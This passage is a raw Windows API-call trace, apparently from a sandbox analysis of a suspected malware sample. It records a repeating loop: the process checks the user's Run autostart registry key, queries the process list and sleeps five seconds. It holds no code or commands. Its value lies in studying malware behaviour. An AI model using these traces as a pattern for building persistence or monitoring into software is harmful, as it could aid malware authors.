Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.107] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.108] NtClose (Handle=0x274) returned 0x0 [0179.108] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.109] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.110] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.110] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.114] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.115] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.116] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.117] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.117] NtClose (Handle=0x274) returned 0x0 [0179.117] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.117] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.120] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.120] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.125] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.126] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.127] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.128] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.128] NtClose (Handle=0x274) returned 0x0 [0179.128] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.130] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.131] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.131] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.135] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.136] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.138] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.139] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.139] NtClose (Handle=0x274) returned 0x0 [0179.139] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.140] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.142] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.142] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.149] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.151] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.152] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.152] NtClose (Handle=0x274) returned 0x0 [0179.152] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.152] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.155] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.155] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.160] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.161] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.162] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.163] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.163] NtClose (Handle=0x274) returned 0x0 [0179.163] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.166] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.166] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.170] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.170] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.172] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.173] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.173] NtClose (Handle=0x274) returned 0x0 [0179.173] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.173] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.175] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.175] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.175] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.180] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.181] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.182] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.183] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.183] NtClose (Handle=0x274) returned 0x0 [0179.183] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.186] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.186] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.191] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.192] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.193] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.194] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.194] NtClose (Handle=0x274) returned 0x0 [0179.194] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.195] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.196] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.197] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.197] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.201] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.202] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.203] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.204] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.204] NtClose (Handle=0x274) returned 0x0 [0179.204] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.206] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.206] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.207] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.212] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.212] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.214] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.214] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.214] NtClose (Handle=0x274) returned 0x0 [0179.214] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.214] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.217] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.223] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.224] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.226] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.226] NtClose (Handle=0x274) returned 0x0 [0179.226] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.228] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.228] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.228] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.232] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.234] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.235] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.235] NtClose (Handle=0x274) returned 0x0 [0179.235] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.237] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.237] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.243] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.243] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.245] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.245] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.245] NtClose (Handle=0x274) returned 0x0 [0179.245] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.248] NtFreeVirtualMemory 